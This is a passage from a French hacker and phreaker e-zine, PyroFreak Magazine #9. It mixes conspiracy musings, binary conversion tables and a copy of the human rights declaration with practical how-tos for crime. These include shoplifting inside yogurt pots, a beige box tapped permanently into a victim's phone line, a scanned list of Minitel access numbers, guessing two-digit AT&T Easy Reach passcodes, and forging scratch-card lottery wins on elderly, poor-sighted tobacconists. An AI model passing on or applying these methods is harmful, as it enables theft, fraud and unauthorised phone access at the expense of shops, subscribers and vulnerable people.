sienne aussi mais qui croire certainement pas les media et le gouvernement...peut-etre je suis dans le tord en disant cela ...quil sont tellement intelligent quil ce disent que lon pense que ces eu qui cache tout mais dans le fond il on raison? Non mais comment on peux la decouvrir cette veriter savoir dou on vien? Ces temps ci des tas de film commence a mettre des moral sur qu'est-ce que nous sommes dou venons nous? Je deviens encore plus interrogatif. Peut-etre que la veriter les egyptien lavais? (comme dans la momie) oui ces egyptien qui on dessinner des sous marin des lunnettes des helicoptere des millers d'années avant notre temps. Et ils on dessinner les Alien d'aujourdhui ouais tout cela est bizzare et tres attirent, je refuserais pas un ti voyage dans les pyramides..jaurais peut-etre la chienne mais quoi! Ou peut-etre encore il ny avais rien avant 200 ans que tout "lhistoire a ete inventer" Suposement quil nous montre pas la veriter a lecole en histoire, mais jai vu cela a la tele alors ca veux rien dire...encore la peut-etre que je me trompe? Fina- lement on en cest rien et jen cerai surement rien dici tot...mais jaimerais ca..svp si connais connais la veriter...msg moi! :) -- 5...4...3...2...1...Bonne...Boum! -- Pour revenir quelques ligne sur le fameux "BuG!". Et qu'est-ce qui arriverais si a 00:00:01 le 1 janvier tout chiais pu rien delectriciter: pu de PC pu de telephone plus grand chose faut dire notre monde est baser la dessus moins nous somme une societe de CONsomateur (hehe mon debile de prof deconomique dit ca! asser laid oui!) Mouais vous aller dire que lelectriciter est une source inepuisable ouais mais si on ne peux pas tout remettre a ON alors faudrais au moins construire dautre barrage et peut-etre dautre reseau de fils. Oui il y a le nucleair mais pas sur qui en a asser et yaurais plutot pas mal de catastrophe...ca cerais pas full hot! Et si le "BuG!" Crérais chez le gouvernement un envie de peser le piton Master Destruction ..bin plutot de peser le piton qui lance des ogives nucleair eliminer lafrique les républiques de banane... ou peut-etre encore leurs ennemie... Ca cerais facile ils on meme dit a la tele quil y avais une osti de date qui avais le bug Y2K dans les ogives non mais trop easy ouais cest la faute a mr. BuG! Y2K La date du ovige est a 01/00 pis on est tellement bright que ca veux dire pour lui lancement et explose sur cuba...non mais tse! Apres ca suposement que dans les char ya des puce electronique non va falloir aller chez le garagiste et dire: eille reparre dont mon bug! svp y part pu!... Encore tout ca pour vous dire qu'on est bin fichu par cest manipulateur...! Et que cest mal faite en criff si tout plante :) -- Maniere de voir La VIE! -- lisez tou ce qui ce rapporte a cela dans tout les autre texte :) Alors profitez de la vie si vous voulez quelques chose nhesitez pas a le dire , si vous avez besoin de parler parler sen ne retenez rien, arreter de faire comme tout le monde et ne dire que: oui allo ca va , oui toi? la vie c pas ce discour de merde caliss! Profitez sen et faites ce que vous voulez ouin... sen trop de faire de connerie hein! :) A prochaine Bye! ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #9 |16-Plusieurs petits articles plus ou moins intéressants (5) |( ) Phreak ( ) Hack (X) Autres '.__________Par Le peuple ________ ______ bill@microsoft.com __ ___ --------------------------------------------------- | Vol à l'étalage : la technique du fromage blanc | | Par Raleigh raleigh@caramail.com | --------------------------------------------------- Vous allez dans un supermarché, et en passant près du rayon K7, vous vous dites tiens c'est pas mal ça, le nouveau single de Dorothée et des Musclées ! Mais manque de chance, vous n'avez plus une cenne, alors vous allez dans le rayon laitage et vous prenez un pot de fromage blanc, de la merde parce que c'est moins cher et parce qu'il n'y a pas de papier isolant sous le couvercle ... Puis, discrètement vous ouvrez le pot et vous mettez la K7 à l'intérieur. Vous remettez le couvercle en vous assurant qu'il n'y a pas de fromage blanc sur le pot (ça fait louche sinon), si il y a des cameras trouvez un angle mort... Moi personnellement, je l'ai fait avec mon pote Cyberdollar et on a voulu essayer avec un parfum à 150 balles mais vu que c'était trop gros et qu'on s'est un peu énervé, on a tapé sur le pot de fromage blanc comme des malades et on a eu du fromage blanc plein les mains et les shoes, en plus vu qu'on avait pris de la grosse merde le fromage blanc était à moitié pourri et ca puait, alors on a planqué le pot sous un rayon et on s'est tiré vite fait, enfin tout ça pour vous dire de pas prendre de trucs trop gros, l'idéal étant des K7 audio, c'est pas la peine de vouloir mettre votre sapin de noel dans votre pot de fromage blanc parce que là je pense que vous allez passer pour foncedé dans le magasin ! ! ! Et à l'occasion, lorsque vous passez près des cuillères, volez en une pour le fromage blanc et puis un peu de sucre au passage...c'est pas bien de gâcher la nourriture !! ------------------------ | Crack de CD-ROM de Q | Par Raleigh raleigh@caramail.com ------------------------ Bon, alors là c'est vraiment tout con et super intéressant pour les petits mateurs, il y a quelques temps vous avez sûrement reçu chez vous des CD de Q, mais évidement en les mettant, vous vous apercevez qu'il faut aller sur le minitel pour pouvoir les visionner ( 5.57 F la minute, c'est cher surtout qu'on peut les avoirs gratos, alors). Les CD en questions sont MICRO CHARME N°2 et 3 et SEXY CHANNEL, ces CD sont évidemment supposés êtres cryptés mais les programmeurs sont des vrais bit, jeu de mot !! Pour les CD " MICRO FOUFOUNE " vous ouvrez les belles petites images sous votre navigateur internet et c'est tout, vous les avez en clair !! Pour les vidéos c'est tout aussi simple il suffit de les copier sur votre HD et puis de renommer leur extension en *.mov au lieu de *.mok !!! Certains CD de jeux de démos ont des images de Q cachées, pratiquement tous, alors démerdez vous pour les trouver et profitez : c'est GRATOS !! ---------------------------- Cacher du texte dans un file ---------------------------- Par ldastray ldastray@yahoo.fr Amis paranoihackes boujour, cette methode vous permettra de planquer du texte dans un fichier de n'importe quelle extension. Cette methode requiere windows 9x puisqu'il faut Wordpad. Laissez tomber la commande edit, le bloc note ou un editeur Hexadecimal j'ai deja essaye ça marche pas. Let's start ! Alors tu prends wordpad (et uniquement wordpad), ouvre ton file qui sera ta couverture (du style un .jpg par ex), y a le code qui apparait, vas a la fin du code, a la ligne (mais sans espace entre le code et le texte), tu tapes ton texte, enregistrer sous, texte seulement, et tu tapes le nom du file et son extention (si ton file de couverture était un .jpg tu tapes .jpg). Voila maintenant tu ouvres ton nouveau file si c'etait un jpg tu vas pouvoir voir l'image et dire qu'il y a du texte caché dedans !!!! Extention de la methode; tu zippes un truc (n'importe quoi), tu edites comme j'ai dis avec Wordpad, tu tapes ton texte et tu saves comme d'ab (en .zip). Avantage de cette methode; moi (qui suis au courant) je vais editer le zip pour lire ton message, le con qui l'interceptera lui il le dezippera (inno- cement, et comme un mongol qu'il est) et touvera un file qui n'a rien à voir (et pas de texte dedans;-))!! Et oui le texte est ds le zip et pas ds le file à l'interieur du zip!! Bluff !!! Voila, tu sais tout (ou presque) de ce que je sais sur la methode. Historique: j'avais une methode d'un type mais qui marchais pas alors j'ai essayé, longtemps, jusqu'à trouver ma propre methode ;-) . Salut _______________________________________________ |Conseils de Cid008 ------ cid008@hotmail.com | |_____________________________________________| Salut la gang de pyrofreak, Bravo pour le zine, très bon. J'ai quelque suggestions a vous faire à propos de sujet que vous avez parler dans vos zines. Sa fais environs 1 1/2 que je me plug gratuitement et je suis intracable, voici ma technique: Premierement: sa fais plusieur année que j'utilise des beige box pour le fun, mais l'année passée, j'ai toruver quelque chose de vraiment hot, dans la boite de ma victime, il y avait une plug 120volt, c'etais la premiere et la seule fois que j'ai vu sa alors j'ai décider d'en profiter :)j'ai installer ma box en permanence et sur elle (la box) j'ai pluger une base de sans fil. Je me suis racheter le meme sans fil pour pouvoir recharger mon tel. Je me suis acheter un modem "combiner" ( le genre de modem qu Non videotex ? ----> Non identifiable 0836050002 SVimp 0836050003 ? 0836050004 Academie de Nantes 0836050005 Securite Routiere 0836050006 Serveur Promogedis 0836050008 CCFP (Commission Nationales ..... ) 0836050009 Segelco GIE 0836050012 EMI 0836050013 Reca Union France 0836050014 Hepta 0836050015 Academie de la Reunion 0836050016 Academie d'Amiens 0836050017 YACCO 0836050018 Transfert d'Appel (France Telecom) 0836050019 Transfert d'Appel (France Telecom) 0836050021 ? 0836050023 AMICAM GTMOSI 0836050024 ? 0836050025 ? 0836050026 ? 0836050027 ? 0836050028 ? 0836050031 Agrale 0836050034 ? 0836050035 ? 0836050036 Banque Populaire 0836050037 ? 0836050038 Fuchs Labo 0836050039 Kraft Jacobs Suchard 0836050041 Duracell 0836050042 INSEE 0836050043 Dossier Social Etudiant 0836050044 SFR (Prise d'Abonnements) 0836050045 Chocolat Poulain 0836050046 Agrale 0836050048 Normandie Service Frais 0836050049 Perceval Distribution (Groupe EDA) 0836050052 ? 0836050055 SFR (Prise d'Abonnements) 0836050056 ? 0836050057 ? 0836050058 Enfants du Monde Entier 0836050061 Asyntel 0836050062 Memo 0836050063 ? 0836050064 ? 0836050065 Test d'appetence chiens et chats 0836050066 SFR (Equipements) 0836050069 ? 0836050071 SOFRES 0836050073 ? 0836050074 ? 0836050076 ? 0836050077 SFR (Ventes et Souscriptions) 0836050078 Coop Atlantiques Saintes 0836050079 ? 0836050081 ? 0836050082 ? 0836050084 ? 0836050085 Fromagerie des Chaumes 0836050087 Centre de Communication de la Cuisine 0836050092 Mannheim Boehringer 0836050095 ? 0836050096 ? 0836050098 CSFI Paris 0836050099 DIESE (Detergents Industriels Entretien Securite) 0836050103 ? 0836050105 Sanofi mail 0836050109 LLP 0836050110 Saint Maclou 0836050112 EDS 0836050114 Mutualite de l'Ain 0836050115 ? 0836050117 Ducs de Gasgogne 0836050118 Callens Lesage 0836050120 Academie de Lille 0836050121 Academie de Lille 0836050122 Academie de Reims 0836050125 Castel 0836050126 ? 0836050127 Finaref 0836050129 Mailfix 0836050130 ? 0836050134 YACCO 0836050135 Diepal NSA 0836050137 Nitrolac 0836050139 Credit Mutuel 0836050140 CRAM 0836050141 Distriborg terradis 0836050143 ? 0836050144 Davigel SA 0836050146 ? 0836050148 Academie d'Aix Marseille 0836050149 Spies Hecker 0836050150 ? 0836050151 ? 0836050153 ? 0836050154 Herberts Standox 0836050156 ? 0836050159 ? 0836050160 Academie de Reims 0836050164 ? 0836050165 SECMA 0836050169 Tupperware 0836050170 ? 0836050171 ARSOE de Bretagne 0836050172 CNED 0836050174 WELLA 0836050176 ? 0836050177 Numeros Speciaux France Telecom (Numero vert) 0836050178 E.LI.CO 0836050180 Academie de Dijon 0836050181 ETS Clemente CSO 0836050182 ? 0836050185 Panzani William Saurin 0836050186 ? 0836050187 ? 0836050189 ? 0836050191 ? 0836050192 Coop 0836050193 Xerox 0836050194 ? 0836050195 ? 0836050196 ? 0836050198 IRIS 0836050201 Operation Promethee 0836050205 Seita 0836050209 DMC Informatique 0836050211 Orangina 0836050214 ? 0836050217 ? 0836050219 ? 0836050220 Boehringer Ingelheim France 0836050227 ? 0836050230 Coop 0836050231 Nutri Expert 0836050232 Academie de Montpellier 0836050233 ? 0836050234 CIMA (Groupama) 0836050235 Pavailler 0836050240 Coop 0836050244 Messagerie Inspecteur de l'Enseignement Agricole 0836050245 Memo 0836050247 ? 0836050248 Grands Moulins de Strasbourg 0836050249 IRIS 0836050254 IRIS 0836050260 Phytobiodermie 0836050263 INSERM (Reseau Sentinelles) 0836050264 Academie de Caen 0836050267 ? 0836050268 ? 0836050269 ? 0836050280 ? 0836050281 ? 0836050282 ? 0836050286 Academie de Caen 0836050287 Messagerie FLE 0836050293 ? 0836050295 ? 0836050298 ? 0836050301 Ulysse 0836050305 3M Sante 0836050308 ? 0836050309 IRIS 0836050311 ? 0836050313 Vistakon 0836050316 ? 0836050318 ? 0836050322 ? 0836050326 ? 0836050342 Boots Healthcare Division 0836050344 ? 0836050346 IBM Global Network 0836050347 Claas France 0836050350 ? 0836050353 ? 0836050358 CNAV 0836050359 Quick FDS 0836050361 ? 0836050364 CSFI 0836050368 ? 0836050369 Yves Saint Laurent 0836050374 ? 0836050375 CIGMA 0836050377 Caisses d'Allocations Familiales 0836050379 Nielsen 0836050380 ? 0836050382 ? 0836050387 IBM Global Network 0836050394 ? 0836050402 DIM 0836050407 ? 0836050408 Centravet 0836050409 ? 0836050410 ? 0836050413 ? 0836050415 Allibeat 0836050417 Telry 0836050419 ? 0836050420 Easymail 0836050421 Messagerie 0836050426 Comutex 0836050427 Harry's 0836050431 Chambre d'Agriculture de Normandie 0836050432 Coveto 0836050437 Academie de Strasbourg 0836050438 ? 0836050442 Glon 0836050443 Groupe Pierre Fabre 0836050447 Gestion des Rendez Vous de France Telecom 0836050448 CIMA (Groupama) 0836050450 Brasseries Kronenbourg 0836050451 ? 0836050454 BMS Archipel 0836050455 Gautier France 0836050456 Impex 0836050457 ? 0836050458 ? 0836050459 SFPA (Societe Francaise de Production Agricole) 0836050460 Messagerie 0836050461 Wolf 0836050462 Centravet 0836050464 Centravet Nancy 0836050466 ? 0836050467 ? 0836050468 Infosat 0836050469 ? 0836050472 Wurth 0836050479 Academie de Strasbourg 0836050481 Laboratoire Pierre Fabre 0836050487 ? 0836050490 Thuasne 0836050496 ? 0836050498 Rhone Poulenc Agro 0836050501 IRIS 0836050503 Academie de Bordeaux 0836050505 Canal + 0836050508 SAF 0836050511 Jady 0836050512 Tefal 0836050517 Sofca 0836050519 Messageries Lyonnaises de Presse 0836050520 Messageries Lyonnaises de Presse 0836050521 Agenda 3000 Informatique 0836050523 IRIS 0836050524 Messagerie Partdieu 0836050525 Edubesancon 0836050527 Plasteurop 0836050528 Opera 0836050531 Avertissements Agricoles de la Protection des Vegetaux 0836050533 Kiabi 0836050539 URCVL 0836050547 Csrpampryl 0836050560 ? 0836050563 Glaxo wellcome 0836050566 Serveur Nicoll 0836050567 Eram 0836050569 CNAF (Caisse Allocation Familiale) 0836050572 IRIS 0836050575 GAM France Restauration 0836050581 DMLA2 0836050582 Mecanoto 0836050583 Axe-Twin 0836050586 IRIS 0836050595 Conseil General du Val d'Oise 0836050596 Jet Services 0836050599 ? 0836050602 SCIC Gestion 0836050603 Promatt/Credoc 0836050604 ? 0836050608 Departement de la Sante des Forets 0836050610 Rosbif 0836050613 ? 0836050614 Boussac 0836050616 Messagerie Videotex 0836050620 RNP (Reseau National de Promotion) 0836050626 Melitta 0836050627 ? 0836050628 ? 0836050629 Motul 0836050637 SNETAA 0836050638 Spontex 0836050640 ? 0836050642 ? 0836050644 ? 0836050654 Snecma 0836050656 Lancome 0836050660 Bureautique Bics 0836050664 Laboratoire Synthelabo 0836050668 ? 0836050670 Glaxo Wellcome 0836050681 Ecran Sante 0836050694 Groupe Immobilier 3F 0836050704 Sofinco 0836050710 JVC France 0836050713 ULN (Union Laitiere Normande) 0836050714 PMU 0836050722 AM International (Service Clients) 0836050723 ? 0836050727 Gist-Brocante 0836050730 Messagerie Premier Brands 0836050735 Sofinco 0836050742 ? 0836050746 Chonette Favor Orion 0836050761 SEMA Group 0836050762 Henkel 0836050763 Abeille Vie 0836050765 Seagram France Distribution 0836050766 Scouts d'Europe 0836050770 ? 0836050772 Clintec Sopharga 0836050773 Comutex EDS 0836050789 Henkel 0836050793 BSE Electromenager 0836050794 Credit Cooperatif 0836050797 ? 0836050802 ? 0836050811 Officetel 0836050822 Memo 0836050826 Minitel Alize 0836050828 Ombre et Soleil 0836050841 Champ d'Or 0836050880 Flodor 0836050887 Bourjois Paris 0836050960 ? 0836050962 Axone 0836050967 Gestetner 0836050982 SGCA (Conseil et Courtage en Assurances) 0836050992 Ganex France 0836050993 Danel Ce scan correspond aux 1000 premiers acces gratos. Beaucoup d'autres acces sont encore à découvrir. Enfin, faites gaffe ! Ces acces sont hypers contrô- lés par France Telecom. Je m'en vais de suite, poursuivre ce scan à la recher- che du savoir interdit... @++ ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #9 : |22-DEPROFONDIS MORPIONIBUS (Pour les Francais) |( ) Phreak ( ) Hack (X) Autres '.________ Par gast0n___ ____ ______________ __st0ng@caramail.com __ __ Vous avez bien sur tous deja joué (ha parce que c'est un jeu, de se faire arnaquer ?) a un de ces bout de papier a grater, ornés de la jolie marque "La Francaise Des Jeux", non ? Et vous avez deja gagne ? Oui ? 5 F ? 10 F ? Pas plus ??? ==> ARNAQUE ==> PARADE : technique dite de "l'arroseur arosse", ou autrement dit de l'anarnaqueur arnaque. Bon j'arrete de debiter des conneries et je m'explique (beu...ca sert a rien tout le monde a compris) : Nous allons faire un peu d'argent de poche sur le dos de la FDJ. 1ere etape: acheter un MORPION Enfin... le jeux morpion, bien sur ! Bon va falloir debourser cinq francs... Bah je sais c'est la ruine mais bon...lol. quoi, je vais quand meme pas vous decrire cette etape en detail, Non ? Si? NON. 2eme etape : Trafiquer le morpion. Un petit shema vaut mieux que de longs discours : ___________________ | MORPION | | | | 50F 1000F 5F | |5000F _____________| |10F | O | X | X | | |____|____|____| |500F| X | O | O | | |____|____|____| |100F| X | O | X | | |____|____|____| |2000F | | | | 219040068810-118 | <== chiffre n'ayant aucune importance | NUL SI DECOUVERT | qui n'est la que pour le realisme. |___________________| (enfin si c'est important, les buralistes peuvent verifier la validite du morpion donc warning !) Bon ca c'est votre morpion tel que vous l'achetez. Merde ! J'ai perdu ! Pas grave on va arranger ca. 1000 balles ca vous dit ? oui ? j'en etait sur! a 1000 F j'ai donc : ____ | X | |____| | O | |____| | O | |____| pfff... un rond de plus et c'etait bon (c'est toujours comme ca ;) Mais regardez a gauche de la croix ya un rond... ____ ____ | O | X | <== et si on inversait les deux ? |____|____| prenez un scalpel ou un cutter | O | (quelque choze qui coupe bien) |____| et decoupez les deux en meme | O | temps (Le O et la X) en coupant |____| SUR le trait noir mais faut pas que ca traverse le papier ! ya deux couches de paper, faut decouper que la 1ere, puis la decoller.Tout cela tres proprement! ensuite inverser les deux puis collez, ce qui vous donne : ==> ____ | O | |____| | O | |____| | O | |____| Apres si ya des traces de decoupage repacer par dessus au stylo noir, d' ou l'importance de decouper sur le trait ! 3eme etape : refiler le morpion et toucher la paye de votre dur travail: Et c'est loin d'etre le plus facile ! il faut trouver un bureau de tabac repondant a ces quelque criteres : -Le tabagiste est vieux, avec mauvaise vue, assez gateux. -Il faut verifier qu'il gratte pas le NUL SI DECOUVERT avant de payer.Pour ca verifier avec un vrai ticket gagnant (c'est hyper dur a trouver ;) ) -Il faut pas qu'il vous connaisse du tout. Choississez un tabac de centre ville ou il y a plein de monde et ou vous etes jamais alle. la mauvaise vue, c'est pour pas qu'il voit le decoupage (si c'est bien fait ya pas de probleme) et aussi pasque ya des espece de lignes biscor- nues pour voir justement si ca a pas ete decoupe. Bon ensuite il suffit de lui refiler, d'un air naturel, tout content meme ! petit conseil : NE JAMAIS ESSAYER PLUS DE 1000 F, sinon faut retirer dans un centre de la francaise des jeux.... :( Moi j'ai essaye avec 50 F, ca a marche.Prochaine etape : 1000F ! (faut pas se gener!). PS: Avec les piles / faces, c'est encore plus facile ! Trouvez en un gagnant (oui, je sais, je sais, ca releve de l'impossible...) et un perdant avec 1000 comme somme (alors la c'est clair que ca peut etre que perdant !). Pas besoin de vous expliquer la suite je pense...(desole mais j'ai horreur de me repeter ;) ) ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #9 |23-Droits de L'Homme |( ) Phreak ( ) Hack (X) Autres '.__________Par PaToFF ________ ______ patoff22@hotmail.com __ ___ Mouais tout le monde a des droits, mais qui les respectent et qui se les fais respecter pas beaucoup de monde vont aller declarer son boss si y vous paye pas asser en ayant peur de perdre sa job , mais si tout le monde s'y met cest eu qui auront peur. Certain auront besoin de certains droits pour ne pas ce faire exploiter par les autoriters ou nimporte quoi ce raportant a la liberté... Les droits de la personne sont la garantie offerte par la société a chaque etre humain qu'il peut faire reconnaitre ses besoins fondamentaux en vue de les satisfaires... Alors voici les droit qui se raporte le mieux a notre Underground et a chacun de nous finalement tout les droits qu'on veut Vraiment!!! LA DÉCLARATION UNIVERSELLE DES DROITS DE L'HOMME ************************************************** L'humanité pleure cinquante millions de victimes. - Considérant que la méconnaissance et le mépris des droit de l'homme ont conduit a des actes de barbarie qui révoltent la consicien de l'humanité le 10 décembre 1948, Paris, par l'assemblée générale des Nations Unies. 48 pays s'unissent pour proclamer et adopter une déclaration à portée universelle. Finalement 56 pays sont présents dans cette institution internationale. " Protéger tout l'homme et protéger les droits de tous les hommes..." -- Article 1 -- Définition de l'etre humain: *Ils déterminent les valeurs fondamentales: -Liberté (solitaire) -Égalité (solitaire) -Fraternité (solidaire) -Rationalité (quete de sens) -- Articles 2-27 -- Les droits qui découlent de la definition de l'etre humain *Les droits d'ordre personnel: (2-11) -Droit a la vie -Droit a la liberté -Droit a la sécurité. -Droit a la dignité -Droit judiciaire *Les droits de l'individu dans ses rapports avec les autres: (12-17) -Droit d'habitation -Droit de circuler librement -Droit de quitter son pays ou d'y revenir -Droit d'asile -Droit a la vie privée et a la réputation -Droit de nationalité -Droit au mariage -Droit de propriété *Les libertés publiques et les droits fondamentaux (18-21) -Liberté de conscience -Liberté de pensée et de croyence -Liberté d'expression -Liberté de réunion pacifique -Liberté d'association et de participation a la vie politique *Les droits économiques, sociaux et culturels (22-27) -Droit à la sécuritité sociale -Droit au travail et à l'action syndicale -Droit au repos et aux loisirs -Droit à la santé -Droit à l'alimentation -Droit au logement -Droit à la protection sociale intelletuelle et artistique -Droit à l'éduccation -Droit à la vie culturelle -Droit à la protection de la création intellectuelle et artistique *Aucun droit n'est absolu et sans limites (28-30) N.B: Seul le respect réciproque des droits permet de les exercer -===== Droit, Articles ====- Articles 1 -Tous les etres humains naissent libres et égaux en dignité et en droits. Ils sont doués de raison et de conscience et doivent agir et uns envers les autres dans un esprit de fraternité -- Les droit d'ordre personnel -- Article 2 Chaque invidu possede tous les doits et libertés décrit dans la déclaration sans distintion de race de couleur , de sexe, de langue, de religion, d'option , d'origine' de fortune, de naissance ou de situation Article 4 L'esclavage et la traite des esclaves sont interdits Article 5 La torture et la chatiments cruels ou dégradants sont interdits Article 6 Chaqun a le droit, ou qu'il se trouve, d'etre protégé par la loi Article 7 Toutes les personnes sont égales devant la loi ont droit a une protection égale contre toute discrimination Article 8 Toute personne a le droit de recourir a la justice de son pays lorsque ses droits fondamentaux sont violés Article 9 Personne ne peut etre arreté emprisonné ou exilé de facon arbitraire Article 10 Toute personne a la droit d'etre entendue par un tribunal independant et impartial qui reconnaitra ses droits et ses et ses obligations ou jugera toute accusation dirigée contre elle Article 11 1) Toute personne accusée d'un délit est présumée innocente jusqu'a ce que sa culpabilité ait été reconnue dans un proces ou sa defence a été legalement assurée 2) Nul ne sera comdamné pour des actions ou des actions ou des omissions qui ne constituaient pas un délit quand elles ont commises; la peine infligée ne sera pas plus forte que celle qui s'appliquait au moment du délit. Article 12 Toute personne a droit au respect de sa vie privée, de sa famille, de son domicile et de sa correspondance à son honneur et a sa réputation; elle a doit a la protection de la loi en cas de vilolation de ces droits Article 13 1) Toute personne a le droit de circuler ou de vivre ou elle le désire 2) Toute personne a le droit de quitter un pays et d'y revenir Article 14 1) Toute personne victime de persécution a le droit de demander asile dans un autre pays et d'y revenir 2) Dans le cas de poursuite fondée sur un crime de droit commun, le meurtre par exemple ou d'actes contraires aux principes et aux buts de la Décla- ration, le droit d'asile ne pourra etre invoqué Article 16 (et la plus cool) Tout individu nubile, sans distinction de race, de nationalité ou de reli- gion a le droit de se marier et de fonder une famile....So cool... :) Article 18 Toute personne a droit a la liberté de pensée, de pensée, de conscience et de religion; elle est libre de changer de religion ou de conviction, de pratiquer ouvertement sa religion, d'affirmer ses conviction publiquement ou privément par la pratique religieuse et lenseignement Article 19 1) Tout individu a droit a la libreté d'opinion et d'expression et au respect de cette liberté 2) Toute personne a le droit de chercher de recevoir et de répandre, par les moyens a sa disposition, les informations et les idées. Article 20 1) Toute personne a droit a la liberté de réunion et d'association pacifique <---------- 2) Toute personne est libre de faire partie ou non d'une association <------ Article 24 Toute personne a droit au repos et aux loisirs, a un horaire de travail raisonnable et a des congés périodiques Article 27 2) L'auteur d'une production scientifique, littéraire artistique a droit a la protection et de ses intéret matériel LES DROITS C'EST L'AFFAIRE DE TOUS... Alors vous en savez un ti peu plus...entk j'espere pour vous. Alors je dois seulement rajouter quelque chose ces droits, sont réel seulement si vous ne faites pas de mal a personne et vous ne contredisiez pas ces droits... Alors vous comprenez? Alors a la prochaine... ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #9 |24-Convertir le binaire en d'autres language |( ) Phreak ( ) Hack (X) Autres '.__________Par Syst3m_Ex ________ ______ syst3m@pyrofreak.org__ ___ (binaire,hexadécimale,octal,décimal,ascii) Dans le monde electronic d'aujourd'hui le Binaire est la base dans la construction technologique. Dans tout circuit électronic il as deux façon que le circuit peux être...On ou Off.Ceci est la base du Binaire.Cette logique du On/Off est ce qui dirige pratiquement tout système électronique. Sur un niveau de base,c'est comme si que les ordinateurs et les circuits font leur décision.La plupart du monde peuvent faire référence au Binaire au examen Vrai ou Faux.C'est ce genre de décision que les ordinateurset les circuit électronique font. Alors de où vient le Binaire ?Le mot Binaire veux dire "2" se qui fais actuellement du sens vu que Binaire veux dire (On/Off,Vrai/Faux,etc..). Les ordinateur reconnaissent le On comme 1 et Offf comme 0.Alors c'est comme si que les ordinateurs prennent leur décision.Par exemple,en regroupant des paquets de 1 et 0 ensemble,l'ordinateur peux reconnaitre des lettres et symboles communement du ASCII, Alors on peux dire que sans la logique Binaire, la technologie moderne et certain ordinateurs cesserais totalment de fonctionner.Cette logique est la seul manière que les circuit électronique et les ordinateurs peuvent faire des décision,et de ces décisions,on a le monde électronic d'aujourd'hui. COMMENT CONVERTIR LE BINAIRE EN HEXADÉCIMALE Hexadécimale est un type de codage que l'ordinateur interne utilise. Pour convertir du Binaire en Hexadécimale dans votre tête c'est pas dure pentoute.On assigne chaque partie du code Binaire une place comme suis: L'example qu'on va prendre sera 1111 Maintenant supposons qu'on commence as 1 et on double jusqu'a être rendu à 8. C'Est exactement comme si qu'on converti le Binaire en Hexadécimale.Si on lit de droite as gauchele premier chiffre devrais être 1,alors la valeur de se chiffre est de 8.Le second chiffre est aussi 1, alors ca valeur est 4.Le troisième chiffre est toujours le 1, alors il équivaut as 2.Le dernier 1 vaut 1. Alors en additionnant toute les valeur on as: 8+4+2+1=15 Alors en décimale se chiffe est 15.Mais en Héxadécimale tout chiffre exedant 10 est assigner par une lettre. A=10 B=11 C=12 D=13 E=14 F=15 Alors, 15 en Héxadécimale équivaut à F. N.B.:Quand vous avez un chiffre comme suis 101000101101 pour le convertir vous aller devoir faire des séquence de 4 chiffre avec... [1010][0010][1101] Après que se chiffre est fractionner vous allez pouvoir convertir chaque petite parti. COMMENT CONVERTIR LE BINAIRE EN OCTAL Octal est un systèm,e numérique qui utilise 8 chiffre (0à8).Il consiste de partis de trois chiffre.Pour convertir le Bianire à Octal: On vas prendre l'exemple de Bianire 111. Comme en Hexadécimale on associe une partie choisi du code Binaire. 1 1 1 (4)(2)(1) Additionner ses valeur de gauche as droite: 4+2+1=7 Alors 111 en Binaire vaut 7 en octal. N.B.:Quand vous avez un chiffre comme suis 101111110101 pour le convertir vous aller devoir faire des séquence de 3 chiffre avec... [101][111][110][101] Après que se chiffre est fractionner vous allez pouvoir convertir chaque petite parti. COMMENT CONVERTIR LE BINAIRE EN DÉCIMALE Pour convertir le Binaire en Décimale c'est vraiment simple.C'est très semblable à la convertion en Hexadécimale.Le concept derrière la convertion Binaire-Décimale fonctionne de manière as que le 1 détermine une place pleine et le 0 une place vide. Prennons 10010011 comme exemple: 1 0 0 1 0 0 1 1 Mettez les velru à leur place: 1 0 0 1 0 0 1 1 (128) (64) (32) (16) (8) (4) (2) (1) Souvenez-vous que la valeur Binaire 1 veux dire qu'il là. 1 0 0 1 0 0 1 1 (128) + (0) + (0) + (16) + (0) + (0) + (2) + (1) = 147 Alors 10010011=147 BINAIRE EN ASCII Ascii Binary Code A 01000001 B 01000010 C 01000011 D 01000100 E 01000101 F 01000110 G 01000111 H 01001000 I 01001001 J 01001010 K 01001011 L 01001100 M 01001101 N 01001110 O 01001111 P 01010000 Q 01010001 R 01010010 S 01010011 T 01010100 U 01010101 V 01010110 W 01010111 X 01011000 Y 01011001 Z 01011010 a 01100001 b 01100010 c 01100011 d 01100100 e 01100101 f 01100110 g 01100111 h 01101000 i 01101001 j 01101010 k 01101011 l 01101100 m 01101101 n 01101110 o 01101111 p 01110000 q 01110001 r 01110010 s 01110011 t 01110100 u 01110101 v 01110110 w 01110111 x 01111000 y 01111001 z 01111010 Period 00101110 Comma 00101100 Space 00100000 -------------------------------------------------------------------------------- Numbers: 0 00110000 1 00110001 2 00110010 3 00110011 4 00110100 5 00110101 6 00110110 7 00110111 8 00111000 9 00111001 -------------------------------------------------------------------------------- Other Miscellaneous Characters: ! 00100001 " 00100010 # 00100011 $ 00100100 (Money counts even in binary!) % 00100101 & 00100110 ' 00100111 ( 00101000 ) 00101001 * 00101010 + 00101011 , 00101100 / 00101111 - 00101101 : 00111010 ; 00111011 < 00111100 = 00111101 > 00111110 ? 00111111 @ 01000000 [ 01011011 \ 01011100 ] 01011101 ^ 01011110 _ 01011111 { 01111011 | 01111100 ~ 01111110 ' 01100000 ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #9 |25-AT&T Easy Reach-800 |(X) Phreak ( ) Hack ( ) Autres '.__________Par Neuro ________ ______ neuro@pyrofreak.org__ ___ Depuis le commencement de mes scans 1-800-XXX-XXXX, j'ai remarqué que beaucoup de numéro étaient relier au service "AT&T Easy Reach-800". Vous aussi, si vous scannez régulierement, vous avez surement déjà rencontré ce type de service, et vous vous êtes surement demander à quoi ca pouvais bien servir. Et bien, dans le court article qui suit, je vais vous expliquer cela. ***Pour Reconnaître ce type de Systeme*** Voici la phrase de greeting qui caractérise ce service: (Elle est dit par une voix automatisé) "AT&T, Easy Reach-800 To complete your call, please enter or speak each number of the access code now." Si vous voulez un exemple de ce systeme, appeler au: 1-800-616-6632 ***Caractéristiques du Service*** Bon, au début je pensais que c'étais un type de VMB, donc j'essaya de cracker le pass. C'est à ce moment, que je me suis rendu compte que ce n'étais qu'un jeu d'enfant de cracker se password, vu qui contenais seulement 2 chiffres sur quasi tout les systemes de ce type. Donc vous avez juste 100 possibili- tés. Voici la phrase que le systeme dit si ta 